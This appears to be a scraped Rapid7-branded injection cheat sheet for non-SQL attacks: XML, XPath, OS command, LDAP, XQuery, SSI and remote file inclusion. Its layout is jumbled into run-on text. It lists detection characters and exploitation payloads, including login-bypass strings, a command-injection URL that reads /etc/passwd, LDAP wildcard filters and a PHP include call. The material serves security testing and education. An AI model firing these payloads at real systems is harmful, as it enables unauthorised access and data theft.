sign in sign up
<<
Home , Code injection

XML Injection INJECTION CHEAT SHEET (non-SQL) Detection www.rapid7.com ‘ single quote “ double quote XPATH Injection < > angular parentheses Detection XML Comment tag ‘ single quote & ampersand “ double quote CDATA section delimiters Exploitation Exploitation ‘ or 1=1 or ‘’=‘ New value of existing tag along with tag name ‘] | * | user[@role=’admin http://www.example.com/addUser.php?us Add user as administrator ername=dan&password=1234560foo@emaildo- “ //NODENAME ” returns all elements in the document main.com “ NODENAME//SUBNODENAME ” returns all SUBNODE under NODE element OS Command Injection “ //NODENAME/[NAME=‘VALUE’] ” returns all NODE that have a NAME child Detection equal to VALUE | Pipe - On *NIX Output of first command to another, http://site.com/login. Login bypass In Windows multiple commands execution aspx?username=foo’ or 1=1 or ‘’=‘ ; semicolon - Running two commands together LDAP Injection Exploitation Detection %% Windows only ( opening bracket & Running command in background (*NIX Only) ) closing bracket ://site.com/whois.php?domain=foobar; Displays content of /etc/passwd file I Pipe - OR operator for LDAP echo+/etc/passwd & Ampersand - AND operator for LDAP XQuery Injection ! Exclamation - NOT operator for LDAP Detection Exploitation ‘ single quote (&(param1=val1)(param2=val2)) AND operator “ double quote (|(param1=val1)(param2=val2)) OR operator Exploitation *)(ObjectClass=*)) Blind LDAP Injection using AND operator ‘ or or .=’ (&(objectClass=void something” or “”=” void)(ObjectClass=void))(&(objectClass=void BLIND LDAP Injection using OR operator http://site.com/xmlsearch?user=foo” or “”=” Displays list of all users with attributes http://site.com/ldapsearch?user=* Displays list of all users with attributes SSI Injection Remote Code Injection Detection Upload File include, echo, exec Look for word Upload file .SHTML File extension PHP, JSP, ASP etc. Injecting active content Exploitation execution! Access back from webroot < ! # = / . “ - > and [a-zA-Z0-9] Required characters for successful execution Remote file inclusion/injection include($incfile); PHP call http://site.com/ssiform.php?showfile=